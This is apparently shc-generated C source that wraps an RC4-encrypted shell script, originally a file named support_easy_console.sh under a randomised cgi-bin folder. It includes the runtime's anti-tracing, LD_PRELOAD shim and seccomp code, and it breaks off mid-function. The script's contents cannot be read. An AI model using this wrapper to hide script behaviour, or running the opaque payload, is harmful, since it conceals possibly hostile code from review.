#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/ajsdhada1563axa184dsanj_support/support_easy_console.sh 
#endif

static  char data [] = 
#define      opts_z	1
#define      opts	((&data[0]))
	"\004"
#define      chk1_z	22
#define      chk1	((&data[4]))
	"\150\060\063\071\301\006\362\226\107\002\071\042\011\271\076\262"
	"\144\225\314\133\076\104\373\352\253\375\204\154"
#define      lsto_z	1
#define      lsto	((&data[29]))
	"\236"
#define      rlax_z	1
#define      rlax	((&data[30]))
	"\243"
#define      tst1_z	22
#define      tst1	((&data[36]))
	"\014\043\213\133\270\157\334\360\375\235\242\377\351\310\107\112"
	"\015\145\111\343\014\240\320\044\222\376\010\232\370\156\043\343"
#define      shll_z	10
#define      shll	((&data[65]))
	"\313\145\235\354\372\143\261\076\040\045\362\375"
#define      msg2_z	19
#define      msg2	((&data[76]))
	"\312\376\074\372\323\155\357\103\357\212\307\044\271\027\275\372"
	"\025\127\020\205\061\032"
#define      inlo_z	3
#define      inlo	((&data[97]))
	"\130\031\112"
#define      text_z	3588
#define      text	((&data[387]))
	"\043\310\044\376\325\107\211\060\000\043\050\157\107\013\246\016"
	"\035\161\164\264\245\012\177\327\044\266\170\124\046\312\174\111"
	"\222\241\107\150\351\321\230\351\365\300\130\075\314\376\114\351"
	"\160\300\236\026\312\035\355\357\324\145\104\373\057\301\104\302"
	"\142\214\052\113\136\303\065\124\203\216\221\120\215\335\072\375"
	"\236\330\024\151\366\002\130\313\150\235\306\230\136\013\132\301"
	"\230\205\014\366\110\102\112\314\320\334\035\135\271\127\133\130"
	"\057\157\301\046\162\032\361\332\267\270\162\025\303\315\327\133"
	"\122\344\121\233\046\234\150\366\170\205\124\062\334\257\212\014"
	"\037\113\063\222\145\044\154\035\334\337\063\240\254\012\373\377"
	"\356\115\233\025\352\003\013\142\210\140\225\145\020\037\161\060"
	"\153\244\302\321\311\057\356\246\016\042\106\273\054\101\272\033"
	"\217\126\060\171\131\074\334\342\235\161\107\255\221\271\335\375"
	"\135\240\316\047\320\275\315\336\337\023\232\014\125\125\050\344"
	"\253\130\136\004\225\072\346\062\253\056\337\075\347\275\072\105"
	"\136\010\154\056\306\071\015\246\115\247\263\242\375\333\207\250"
	"\064\345\255\311\040\224\374\314\302\334\011\251\231\103\357\370"
	"\114\133\047\022\225\064\271\342\334\154\205\331\110\014\202\100"
	"\334\136\241\136\033\146\213\372\136\112\103\105\234\014\302\350"
	"\326\144\162\110\204\233\206\134\026\051\240\014\305\207\245\052"
	"\122\102\237\071\010\006\050\332\334\017\367\177\130\232\242\365"
	"\236\304\130\254\011\233\356\116\133\174\325\121\111\377\302\362"
	"\156\034\115\312\220\226\343\032\262\372\117\004\115\365\344\032"
	"\022\202\263\375\142\032\251\215\167\153\334\273\016\007\101\261"
	"\037\170\217\235\154\225\321\265\164\202\015\163\045\122\142\071"
	"\330\024\202\136\256\207\044\020\313\360\321\335\014\057\264\201"
	"\203\222\130\063\300\026\227\341\151\143\007\160\144\067\340\101"
	"\136\312\232\134\124\102\113\214\367\022\216\133\247\054\050\115"
	"\105\255\175\333\316\114\124\163\231\121\305\027\146\245\354\004"
	"\261\360\235\372\251\354\311\350\070\346\074\105\045\064\342\350"
	"\054\023\162\255\171\065\060\205\144\254\344\223\210\024\235\173"
	"\160\245\040\041\302\351\071\241\164\226\172\377\030\220\316\342"
	"\065\241\046\014\317\075\155\025\262\377\335\074\265\331\311\227"
	"\226\345\317\044\167\066\004\171\044\205\136\020\356\225\101\047"
	"\011\256\367\161\227\235\004\001\127\027\061\271\175\362\204\012"
	"\126\327\071\326\172\141\152\171\122\376\220\143\023\017\126\241"
	"\133\037\131\323\336\016\073\251\051\034\072\166\060\206\266\214"
	"\156\253\175\155\331\034\373\037\212\061\217\065\020\355\066\006"
	"\142\111\337\071\135\067\331\075\344\105\356\240\362\005\115\262"
	"\141\125\357\233\346\273\142\275\172\155\377\235\377\137\046\351"
	"\317\036\002\023\213\235\167\216\064\215\260\367\204\362\014\120"
	"\261\124\223\024\054\160\206\123\317\227\133\144\331\316\071\310"
	"\343\363\214\362\135\274\017\334\017\213\366\037\341\372\070\203"
	"\220\277\230\150\230\122\167\345\230\055\351\272\251\373\260\147"
	"\112\307\225\175\334\365\136\077\255\224\241\305\311\216\150\325"
	"\170\221\234\075\211\014\237\321\161\171\154\250\374\223\126\241"
	"\040\327\142\043\034\227\265\330\316\352\332\060\130\162\351\160"
	"\362\223\302\036\230\130\323\247\047\221\014\226\105\177\127\053"
	"\137\063\347\000\162\373\371\344\300\217\112\132\050\111\236\064"
	"\134\113\361\353\144\306\252\254\174\077\155\007\162\007\223\164"
	"\073\063\272\271\152\021\313\112\124\371\010\221\356\372\150\367"
	"\043\327\276\207\344\270\274\327\337\227\344\063\004\024\014\052"
	"\201\175\341\310\001\061\041\072\034\354\000\212\225\117\322\127"
	"\071\337\270\013\174\000\303\170\020\033\050\126\020\301\110\024"
	"\056\336\152\075\160\130\321\351\131\032\307\064\273\214\306\314"
	"\102\154\257\307\222\216\117\332\166\121\303\177\020\021\113\365"
	"\206\372\142\173\130\036\047\210\036\017\162\242\275\025\275\061"
	"\160\270\334\234\111\071\366\242\131\031\236\010\047\225\007\271"
	"\250\245\333\074\327\133\376\043\147\372\313\057\022\076\007\145"
	"\220\131\366\372\030\304\374\354\015\054\320\053\066\121\036\104"
	"\274\001\230\136\234\365\034\370\304\330\022\071\310\172\064\351"
	"\336\032\067\024\255\346\230\204\320\110\370\353\124\232\212\341"
	"\072\063\251\000\041\324\025\267\274\037\174\356\215\137\170\246"
	"\156\143\143\264\112\372\174\014\334\151\056\353\204\373\245\173"
	"\033\347\162\131\241\041\126\072\225\012\327\170\267\123\107\372"
	"\145\200\327\204\244\265\132\234\355\334\105\005\013\371\141\153"
	"\200\226\133\151\222\112\116\361\052\301\054\304\314\035\264\175"
	"\116\341\132\266\303\225\050\057\224\372\132\050\061\155\266\120"
	"\016\312\173\052\135\145\106\002\225\167\334\121\245\061\041\350"
	"\063\325\124\171\223\374\201\274\326\203\037\235\350\143\004\166"
	"\257\242\315\073\176\066\076\370\364\321\041\253\000\113\025\051"
	"\143\044\072\236\004\223\204\232\013\326\072\175\354\120\356\052"
	"\210\015\113\367\317\340\147\242\115\310\272\041\117\050\116\107"
	"\055\251\072\042\101\161\007\263\002\351\073\322\214\051\151\020"
	"\301\115\040\215\130\223\111\017\000\257\336\051\165\110\200\363"
	"\345\200\033\264\141\344\333\044\227\316\301\236\155\147\176\007"
	"\153\071\367\305\103\254\224\106\166\372\206\213\041\272\037\064"
	"\033\024\376\040\021\020\072\306\014\352\342\206\351\322\230\347"
	"\266\005\172\362\150\150\177\137\356\324\356\212\055\270\317\011"
	"\157\022\243\352\367\247\032\161\271\304\010\134\331\256\166\231"
	"\242\347\111\020\037\127\374\332\121\131\330\363\113\060\227\373"
	"\231\062\141\363\023\243\252\263\251\111\062\144\133\301\243\342"
	"\066\307\160\355\262\176\056\321\035\045\246\017\255\100\053\131"
	"\055\172\024\234\314\074\301\034\372\170\250\166\025\135\135\113"
	"\204\301\212\246\370\146\300\045\015\015\127\110\336\146\277\201"
	"\257\041\351\344\042\333\314\145\063\156\050\122\042\245\253\305"
	"\070\313\143\071\235\113\207\133\214\042\106\051\133\071\353\356"
	"\223\361\161\340\244\256\377\365\104\325\234\174\316\202\355\101"
	"\260\273\070\056\341\076\144\161\075\160\374\237\373\351\043\166"
	"\350\264\337\250\171\030\140\371\010\127\126\043\373\125\214\070"
	"\360\351\074\145\014\122\211\100\010\054\216\254\350\343\116\040"
	"\054\306\367\171\030\074\213\313\352\367\220\313\366\334\367\254"
	"\066\345\035\361\120\263\061\371\152\250\355\161\173\075\041\040"
	"\347\105\141\377\217\247\232\346\260\147\273\361\245\250\016\075"
	"\253\151\262\231\017\173\227\067\124\315\245\304\131\070\304\211"
	"\046\152\345\226\321\323\014\324\074\021\263\165\321\022\220\101"
	"\247\024\134\124\131\136\160\221\030\000\202\324\225\367\375\210"
	"\034\043\136\162\202\325\130\165\343\266\146\065\374\115\055\324"
	"\315\345\016\121\046\340\003\322\352\117\021\066\004\011\136\146"
	"\322\141\042\221\122\263\127\111\242\153\154\375\253\137\013\177"
	"\237\131\054\255\366\352\122\025\170\202\370\122\352\347\230\056"
	"\332\032\175\267\312\055\330\354\117\276\244\176\244\031\067\324"
	"\025\354\145\172\166\255\050\170\133\302\333\134\167\202\075\064"
	"\161\255\240\033\154\071\310\223\254\023\173\270\053\106\004\355"
	"\212\063\377\132\344\326\124\052\173\321\223\176\274\155\103\012"
	"\303\377\073\061\357\210\367\361\042\220\020\224\065\147\170\016"
	"\362\214\351\163\137\116\303\043\200\303\151\021\065\055\146\371"
	"\261\060\214\025\103\324\157\275\211\277\025\354\030\174\137\251"
	"\132\036\250\151\270\315\050\137\073\026\277\323\365\224\366\344"
	"\170\136\005\377\331\134\072\242\366\057\354\361\150\055\040\361"
	"\201\375\036\227\244\255\202\021\130\222\051\276\130\147\142\044"
	"\066\053\014\240\244\217\170\175\307\334\363\056\151\255\071\235"
	"\360\353\017\360\342\165\127\270\173\151\303\373\213\101\104\046"
	"\302\315\162\140\150\346\026\333\322\300\022\135\055\143\007\176"
	"\233\240\036\054\331\066\231\330\326\355\245\026\246\214\157\200"
	"\070\166\311\364\203\333\234\333\020\010\331\111\247\016\250\037"
	"\367\026\317\065\161\254\301\157\230\365\247\030\317\307\257\157"
	"\125\036\034\352\255\320\217\365\127\337\372\116\310\233\163\142"
	"\115\311\317\063\216\271\177\147\055\250\175\165\230\047\200\147"
	"\175\305\273\102\310\173\074\006\036\225\165\357\013\071\022\375"
	"\224\245\110\135\256\100\023\201\173\017\354\321\116\274\023\344"
	"\001\345\300\244\154\312\023\241\317\204\133\354\302\172\356\351"
	"\314\154\013\046\325\276\056\176\015\320\137\346\362\340\332\340"
	"\144\257\200\130\057\047\060\315\024\160\203\260\213\302\273\262"
	"\170\322\156\301\335\175\123\202\156\313\061\213\373\273\325\251"
	"\373\374\362\220\252\237\177\344\327\203\236\177\123\373\125\160"
	"\376\105\205\147\346\044\143\234\103\215\251\047\175\362\336\370"
	"\105\036\374\205\312\360\067\320\134\256\227\217\370\046\206\346"
	"\367\146\253\100\156\262\372\005\053\216\323\037\072\152\177\303"
	"\166\345\267\144\141\250\163\166\210\034\223\000\374\034\275\144"
	"\276\250\121\012\032\254\254\025\242\075\227\064\227\116\057\123"
	"\320\167\032\021\165\161\335\315\341\173\304\330\114\374\364\227"
	"\243\372\217\101\260\162\176\222\032\047\357\311\151\331\147\376"
	"\374\345\046\122\171\147\122\111\215\234\006\253\074\134\113\063"
	"\006\343\210\311\251\227\075\067\064\240\056\363\060\133\010\323"
	"\244\007\311\005\332\335\173\222\256\302\326\160\336\164\162\204"
	"\010\051\024\267\225\315\374\126\367\300\157\016\112\222\065\257"
	"\151\110\053\026\225\301\002\064\047\273\261\001\213\313\126\362"
	"\117\142\225\107\367\372\170\123\160\306\044\367\022\147\164\105"
	"\200\064\033\001\050\306\012\364\346\061\375\101\351\017\304\343"
	"\142\062\136\125\144\200\263\163\135\217\037\135\105\024\016\061"
	"\244\062\111\350\316\372\305\207\134\177\302\352\131\075\035\040"
	"\273\120\330\141\230\024\005\064\207\275\355\355\330\373\160\113"
	"\344\335\036\140\230\360\050\236\135\132\157\012\213\165\227\063"
	"\141\334\364\207\342\215\115\045\336\362\032\272\231\322\252\117"
	"\277\143\376\257\034\145\173\001\137\153\354\377\242\207\045\240"
	"\300\366\363\030\211\072\143\063\147\244\004\270\364\073\157\224"
	"\347\012\366\012\130\064\231\350\271\343\026\127\343\002\071\317"
	"\212\113\121\153\057\252\177\311\176\201\220\067\154\053\055\277"
	"\372\376\115\043\044\013\100\250\215\326\100\162\351\036\347\122"
	"\241\162\000\303\233\205\010\050\346\174\337\302\043\230\263\137"
	"\074\010\104\363\020\313\214\367\174\231\216\272\123\012\276\167"
	"\222\131\320\122\066\055\170\071\074\015\375\000\040\035\006\072"
	"\120\275\352\267\141\173\352\142\110\011\307\117\013\105\300\020"
	"\064\041\173\042\227\245\040\121\360\365\162\372\014\104\154\251"
	"\122\000\316\327\362\114\105\035\311\273\250\325\057\320\043\167"
	"\365\035\256\262\055\040\333\323\016\206\103\056\050\040\142\247"
	"\332\364\014\061\011\272\100\144\245\217\144\140\242\067\144\272"
	"\016\065\314\213\062\274\361\111\255\356\011\331\224\012\244\321"
	"\134\327\234\124\260\140\324\260\121\056\230\363\060\306\152\174"
	"\004\355\045\226\065\360\153\326\260\241\303\034\267\261\306\254"
	"\245\216\200\065\214\360\067\140\005\023\145\367\076\227\156\155"
	"\263\122\235\244\126\375\123\125\205\034\125\224\015\172\013\030"
	"\112\032\272\003\232\354\325\130\334\142\016\045\215\270\360\170"
	"\231\341\120\250\126\163\152\010\017\117\224\121\202\367\246\042"
	"\053\362\050\243\047\325\307\162\216\131\272\170\136\370\356\067"
	"\145\323\055\122\345\116\004\336\243\254\155\142\027\231\271\141"
	"\253\072\107\133\307\170\257\116\312\345\076\106\105\334\130\076"
	"\240\015\344\215\352\032\206\112\355\200\003\036\027\307\024\337"
	"\073\057\301\277\301\327\216\217\130\352\342\046\120\071\260\337"
	"\335\001\240\355\274\076\366\163\162\016\177\332\327\050\152\263"
	"\123\053\011\262\004\163\266\365\174\276\345\270\057\334\205\240"
	"\276\254\130\063\034\075\355\256\235\366\103\143\247\142\214\073"
	"\177\150\023\062\235\001\245\141\111\221\243\321\111\243\020\077"
	"\251\152\363\033\334\371\215\123\064\316\053\344\355\155\301\027"
	"\333\174\013\340\140\301\264\356\202\303\334\156\372\036\326\002"
	"\077\251\337\153\177\133\250\300\262\235\126\134\236\237\173\027"
	"\256\122\153\113\046\271\277\224\121\332\313\232\273\377\171\111"
	"\205\225\314\243\017\274\250\024\375\345\135\111\116\343\156\122"
	"\004\111\245\345\120\362\255\366\367\147\054\104\062\037\267\164"
	"\063\075\172\043\013\236\131\216\342\223\377\205\225\274\076\306"
	"\026\237\152\206\106\070\055\276\310\130\111\246\267\050\240\045"
	"\103\015\031\057\146\013\160\332\172\275\326\176\273\153\342\110"
	"\067\103\031\122\170\374\174\130\372\060\114\271\104\063\066\247"
	"\326\106\346\132\350\220\016\037\176\267\207\176\237\164\366\271"
	"\235\045\377\012\077\140\064\125\233\222\161\171\361\357\250\306"
	"\071\266\333\055\366\053\242\117\103\276\315\251\157\240\047\303"
	"\376\202\224\106\320\011\255\370\255\205\244\344\360\300\072\040"
	"\024\124\120\127\021\062\345\215\372\071\137\010\217\057\174\011"
	"\110\161\076\313\004\052\363\374\135\145\325\306\063\242\337\322"
	"\212\120\340\334\346\076\357\173\322\330\234\036\021\106\044\233"
	"\130\245\217\166\376\227\300\314\362\031\252\046\326\111\000\336"
	"\357\313\177\022\173\045\047\160\014\211\105\004\326\272\344\312"
	"\275\030\222\324\231\226\170\171\315\334\347\366\272\310\223\003"
	"\135\121\014\214\312\050\225\015\330\011\012\341\015\073\117\256"
	"\033\041\371\126\110\212\166\105\007\172\110\160\260\271\103\104"
	"\026\346\361\145\303\210\367\203\303\103\140\007\224\161\264\374"
	"\213\343\360\206\276\346\051\243\162\161\236\172\213\116\062\134"
	"\174\071\023\315\042\213\146\212\020\307\245\226\012\063\317\266"
	"\000\017\000\110\126\202\307\214\043\137\373\021\242\101\231\210"
	"\311\111\077\251\341\166\126\164\237\322\142\015\063\311\322\011"
	"\132\313\270\026\241\260\155\000\306\026\347\317\265\264\245\115"
	"\304\000\302\252\042\332\012\171\067\066\042\353\116\320\373\350"
	"\063\207\120\313\245\011\365\205\137\371\201\255\377\207\061\004"
	"\327\217\106\160\000\274\010\254\161\217\236\214\121\054\125\310"
	"\346\102\136\303\026\273\231\173\355\323\036\334\017\331\122\216"
	"\111\240\206\236\243\022\246\222\242\166\141\337\107\125\374\205"
	"\140\017\130\270\321\216\204\252\024\302\162\160\211\233\215\374"
	"\325\362\342\126\060\350\350\302\171\112\342\014\224\320\334\147"
	"\053\321\340\103\250\026\220\316\165\162\207\016\217\057\226\262"
	"\260\277\071\017\115\266\203\156\136\016\311\171\325\220\051\122"
	"\161\270\216\304\326\362\030\264\135\351\336\040\077\121\326\150"
	"\237\132\165\332\217\022\377\170\213\045\171\163\067\360\336\041"
	"\306\122\051\056\140\347\012\217\210\152\075\243\174\320\314\323"
	"\316\364\226\332\117\371\330\110\142\370\115\062\150\363\056\123"
	"\175\365\025\010\356\333\364\163\036\305\033\303\117\067\345\237"
	"\200\202\007\052\336\066\072\260\231\212\275\142\367\107\370\134"
	"\274\351\132\001\304\117\111\207\204\074\337\046\010\112\231\112"
	"\323\051\276\000\304\347\116\224\033\013\324\351\061\210\331\247"
	"\330\214\210\254\106\252\105\317\251\375\233\152\230\251\063\175"
	"\164\111\146\031\022\357\154\267\167\140\276\051\361\213\061\340"
	"\275\111\006\135\201\312\251\006\277\202\256\317\172\117\224\132"
	"\333\006\036\352\002\007\246\202\053\063\174\277\127\037\306\374"
	"\042\325\355\215\130\314\064\342\045\231\015\151\021\113\206\250"
	"\257\066\226\251\075\170\034\020\173\203\055\317\014\150\216\070"
	"\317\262\230\061\327\213\045\167\267\042\174\322\114\321\355\157"
	"\222\330\140\235\365\131\362\215\025\305\235\153\034\054\167\114"
	"\325\346\325\070\330\170\166\334\334\320\143\223\066\066\375\350"
	"\002\311\205\371\215\237\067\276\017\326\337\114\003\161\264\004"
	"\356\245\246\031\233\202\340\021\304\256\000\072\357\173\232\146"
	"\304\124\166\057\142\177\226\200\127\327\105\207\017\025\261\134"
	"\176\011\046\116\304\077\123\176\320\263\273\116\076\101\261\162"
	"\373\307\242\377\147\315\300\037\372\371\342\017\230\256\147\147"
	"\141\333\321\356\230\042\025\344\272\131\037\014\317\253\006\162"
	"\317\100\375\126\374\055\121\120\145\303\074\313\074\060\233\310"
	"\370\004\175\152\261\142\243\216\077\341\146\033\126\017\244\303"
	"\050\333\131\126\157\325\113\037\062\063\036\301\367\342\212\327"
	"\100\342\036\046\366\040\125\250\227\045\252\232\363\166\324\067"
	"\236\004\061\224\114\157\315\250\277\065\103\301\316\037\206\224"
	"\041\162\233\143\274\215\367\324\105\316\304\317\124\317\216\320"
	"\227\166\023\202\360\042\225\251\061\063\205\220\117\120\106\134"
	"\236\263\017\107\150\031\136\074\263\045\300\272\253\041\364\316"
	"\244\050\331\174\362\057\106\023\303\102\337\206\036\350\060\270"
	"\054\037\261\170\172\330\213\017\015\104\362\351\261\167\303\371"
	"\204\105\166\167\165\275\212\070\377\151\277\036\121\357\327\176"
	"\016\210\366\211\140\202\231\155\307\213\127\170\003\033\162\207"
	"\141\351\376\326\246\210\017\246\362\316\304\104\275\233\302\314"
	"\044\270\125\204\073\356\362\002\172\112\172\175\145\355\004\306"
	"\326\003\235\174\214\254\042\176\172\347\302\070\203\204\004\247"
	"\075\132\054\170\110\036\172\303\151\365\100\316\343\105\225\271"
	"\110\062\066\324\336\131\123\131\101\025\221\304\232\225\153"
#define      tst2_z	19
#define      tst2	((&data[4119]))
	"\120\070\266\313\237\363\243\143\375\034\241\027\217\243\007\206"
	"\150\207\175\067\176\004\242\373\037"
#define      chk2_z	19
#define      chk2	((&data[4141]))
	"\244\263\212\313\131\027\146\330\130\222\000\217\257\201\163\323"
	"\060\226\332\335\201\204\136\311"
#define      pswd_z	256
#define      pswd	((&data[4201]))
	"\225\356\361\356\060\007\200\364\241\026\140\171\006\370\312\077"
	"\256\226\072\316\127\167\275\374\370\101\132\302\370\357\140\215"
	"\336\122\174\016\131\334\231\052\170\227\316\116\101\252\007\275"
	"\234\230\034\111\211\362\045\177\346\243\236\266\054\316\052\253"
	"\007\300\126\340\235\357\013\025\206\331\144\310\203\154\205\040"
	"\004\242\151\215\225\217\014\173\063\253\061\137\171\133\012\200"
	"\034\141\141\272\120\154\317\327\106\064\240\311\240\046\352\244"
	"\311\123\062\136\343\076\331\026\351\012\165\142\146\200\343\203"
	"\342\105\075\063\262\015\012\370\102\253\302\342\321\254\207\232"
	"\000\271\371\343\370\322\371\341\335\157\104\104\360\050\307\322"
	"\155\005\005\040\022\020\030\124\273\332\067\215\207\276\050\207"
	"\170\041\152\160\364\144\122\321\323\227\026\304\277\335\226\055"
	"\342\234\115\365\255\145\112\151\100\201\366\307\100\037\116\270"
	"\101\270\051\065\035\173\007\360\022\035\265\322\373\114\377\336"
	"\350\114\323\225\261\035\376\362\237\365\271\337\024\007\230\125"
	"\300\301\213\335\075\222\316\120\260\204\042\253\320\042\211\270"
	"\156\135\116\040\173\115\022\032\103\314\372\127\323\222\255\224"
	"\123\070\162\221\313\101\341\173\305\004\047\225\046\260\116\225"
	"\016\235\265\211\352\374\003\372\023\144\164\031\134\077\130\013"
	"\325\223\332\055\012\227\051\003\330\203\305\321\163\046\137\121"
	"\170\333\140\321\330\144\314\353\310\101\005\044\200"
#define      xecc_z	15
#define      xecc	((&data[4497]))
	"\274\124\243\245\103\036\343\105\204\311\302\076\111\012\236\361"
#define      msg1_z	65
#define      msg1	((&data[4521]))
	"\241\254\377\172\057\304\113\243\166\350\041\377\230\131\266\266"
	"\072\217\256\015\335\366\301\246\057\332\145\037\370\333\045\320"
	"\247\227\235\060\132\332\116\157\043\134\163\133\204\262\277\024"
	"\053\135\157\263\071\232\362\315\233\226\215\331\104\152\253\066"
	"\045\140\243\116\046\165\344\325\075\352\252\364\142\206\125\064"
	"\136\271\000\112\201\101\120\245\302"
#define      date_z	1
#define      date	((&data[4602]))
	"\322"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
